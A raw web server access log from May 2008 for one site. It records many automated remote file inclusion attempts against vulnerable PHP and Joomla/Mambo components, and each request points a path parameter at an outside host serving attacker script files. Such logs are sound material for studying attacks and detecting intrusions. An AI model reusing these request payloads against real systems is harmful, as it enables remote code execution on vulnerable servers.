69.64.81.28 - - [28/May/2008:11:07:34 -0700] "GET /logs/access_080109.log/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:11:07:34 -0700] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:11:07:34 -0700] "GET /logs/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.65.154 - - [28/May/2008:11:08:47 -0700] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://internetforall.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.62.55.115 - - [28/May/2008:11:08:51 -0700] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.bestpaket.ru/netcat//dump/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.247.36.34 - - [28/May/2008:11:08:53 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.247.36.34 - - [28/May/2008:11:08:54 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.247.36.34 - - [28/May/2008:11:08:54 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:08:59 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:08:59 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:08:59 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:09:04 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:09:05 -0700] "GET //ashnews.php?pathtoashnews=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:11:09:05 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:11:09:10 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:09:13 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:09:13 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:09:13 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
61.63.40.205 - - [28/May/2008:11:09:16 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.63.40.205 - - [28/May/2008:11:09:16 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.180.134.223 - - [28/May/2008:11:09:51 -0700] "GET /logs/access_080308.log/photo/update/update5.php?lang=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.22.204.188 - - [28/May/2008:11:09:52 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [28/May/2008:11:09:52 -0700] "GET //ashnews.php?pathtoashnews=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [28/May/2008:11:09:52 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:11:10:09 -0700] "GET /logs/access_080107.log/index2.php?option=com_rsgallery2&Itemid=&mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:11:10:10 -0700] "GET /index2.php?option=com_rsgallery2&Itemid=&mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:11:10:10 -0700] "GET /logs/index2.php?option=com_rsgallery2&Itemid=&mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:11:10:18 -0700] "GET /logs//index.php?option=com_wrapper&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:11:10:19 -0700] "GET //index.php?option=com_wrapper&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
64.180.134.223 - - [28/May/2008:11:10:19 -0700] "GET /logs/access_080218.log/photo/update/update5.php?lang=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.247.36.34 - - [28/May/2008:11:10:25 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.8.73.90 - - [28/May/2008:11:10:40 -0700] "GET /logs/access_071224.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:11:10:47 -0700] "GET /logs/access_080225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.69.184 - - [28/May/2008:11:10:52 -0700] "GET /logs/access_080313.log//index.php?sourcedir=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.69.184 - - [28/May/2008:11:10:54 -0700] "GET /logs/access_080301.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.69.184 - - [28/May/2008:11:10:55 -0700] "GET //index.php?sourcedir=http://www.shikea.se/ids.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.69.184 - - [28/May/2008:11:10:55 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.69.184 - - [28/May/2008:11:10:55 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.69.184 - - [28/May/2008:11:10:55 -0700] "GET /logs//index.php?sourcedir=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:11:10:59 -0700] "GET /logs/access_080228.log/xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:11:11:00 -0700] "GET /xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:11:11:00 -0700] "GET /logs/xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.106.143.80 - - [28/May/2008:11:11:05 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [28/May/2008:11:11:05 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
72.47.201.117 - - [28/May/2008:11:11:05 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
64.106.143.80 - - [28/May/2008:11:11:05 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [28/May/2008:11:11:09 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
72.47.201.117 - - [28/May/2008:11:11:09 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:11:11:11 -0700] "GET /logs/access_080310.log/xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.53.8.217 - - [28/May/2008:11:11:16 -0700] "GET /logs/access_080118.log/modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.aula-verde.com.ar/cache/.no_deleted.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.53.8.217 - - [28/May/2008:11:11:16 -0700] "GET /modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.aula-verde.com.ar/cache/.no_deleted.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.53.8.217 - - [28/May/2008:11:11:17 -0700] "GET /logs/modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.aula-verde.com.ar/cache/.no_deleted.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.78.216.197 - - [28/May/2008:11:11:27 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/nialeva/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
82.78.216.197 - - [28/May/2008:11:11:27 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/nialeva/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
74.208.69.184 - - [28/May/2008:11:11:38 -0700] "GET /logs/access_080213.log//index.php?sourcedir=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.69.184 - - [28/May/2008:11:11:48 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:12:02 -0700] "GET /logs/access_080401.log//ashnews.php?pathtoashnews=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.227.103.40 - - [28/May/2008:11:12:07 -0700] "GET /logs//nuke_path/htmltonuke.php?filnavn=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
212.227.103.40 - - [28/May/2008:11:12:07 -0700] "GET //nuke_path/htmltonuke.php?filnavn=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
64.106.143.80 - - [28/May/2008:11:12:09 -0700] "GET /logs/access_080401.log//ashnews.php?pathtoashnews=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.208.69.184 - - [28/May/2008:11:12:23 -0700] "GET /logs//index.php?sourcedir=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:12:24 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.208.69.184 - - [28/May/2008:11:12:24 -0700] "GET //index.php?sourcedir=http://www.shikea.se/ids.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:12:25 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:12:25 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:12:25 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:12:26 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:12:26 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.62.55.102 - - [28/May/2008:11:12:35 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.55.102 - - [28/May/2008:11:12:35 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.55.102 - - [28/May/2008:11:12:36 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:12:40 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:12:40 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.208.69.184 - - [28/May/2008:11:12:55 -0700] "GET /logs/access_080225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.188 - - [28/May/2008:11:13:05 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [28/May/2008:11:13:05 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [28/May/2008:11:13:05 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.7.147.137 - - [28/May/2008:11:13:06 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
196.7.147.137 - - [28/May/2008:11:13:06 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:11:13:15 -0700] "GET /logs/access_080330.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:11:13:16 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:11:13:16 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.69.184 - - [28/May/2008:11:13:23 -0700] "GET /logs/access_071226.log//PHP_CON/Exchange/include.php?webappcfg%5BAPPPATH%5D=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.69.184 - - [28/May/2008:11:13:23 -0700] "GET //PHP_CON/Exchange/include.php?webappcfg%5BAPPPATH%5D=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.69.184 - - [28/May/2008:11:13:23 -0700] "GET /logs//PHP_CON/Exchange/include.php?webappcfg%5BAPPPATH%5D=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.247.36.34 - - [28/May/2008:11:13:24 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.247.36.34 - - [28/May/2008:11:13:24 -0700] "GET //ashnews.php?pathtoashnews=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.247.36.34 - - [28/May/2008:11:13:25 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.208.69.184 - - [28/May/2008:11:13:25 -0700] "GET //lazarusgb/admin.php?include_path=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:13:53 -0700] "GET /logs/access_080118.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:13:58 -0700] "GET /logs/access_080118.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.208.69.184 - - [28/May/2008:11:13:59 -0700] "GET /logs/access_071224.log//PHP_CON/Exchange/include.php?webappcfg%5BAPPPATH%5D=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.69.184 - - [28/May/2008:11:14:04 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.69.184 - - [28/May/2008:11:14:04 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.69.184 - - [28/May/2008:11:14:04 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.246.128.120 - - [28/May/2008:11:14:05 -0700] "GET /logs/errors.php?error=http://internetforall.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.246.128.120 - - [28/May/2008:11:14:05 -0700] "GET /errors.php?error=http://internetforall.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:14:23 -0700] "GET /logs/access_080118.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.208.69.184 - - [28/May/2008:11:14:32 -0700] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:14:41 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:14:45 -0700] "GET /logs/access_080401.log//ashnews.php?pathtoashnews=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:14:45 -0700] "GET /logs/access_080401.log//ashnews.php?pathtoashnews=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:11:14:47 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/mahesaputra53/kiss.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:11:14:48 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/mahesaputra53/kiss.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:11:14:48 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/mahesaputra53/kiss.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:14:49 -0700] "GET /logs/access_080118.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:14:50 -0700] "GET /logs/access_080118.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.190.24.146 - - [28/May/2008:11:14:50 -0700] "GET /logs/access_080118.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.208.69.184 - - [28/May/2008:11:14:53 -0700] "GET /logs/access_080228.log//content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.69.184 - - [28/May/2008:11:14:53 -0700] "GET //content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.69.184 - - [28/May/2008:11:14:53 -0700] "GET /logs//content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:15:11 -0700] "GET /logs/index.php?redir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.30.73.117 - - [28/May/2008:11:15:12 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
200.30.73.117 - - [28/May/2008:11:15:12 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
74.208.69.184 - - [28/May/2008:11:15:12 -0700] "GET /logs/access_071223.log//content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
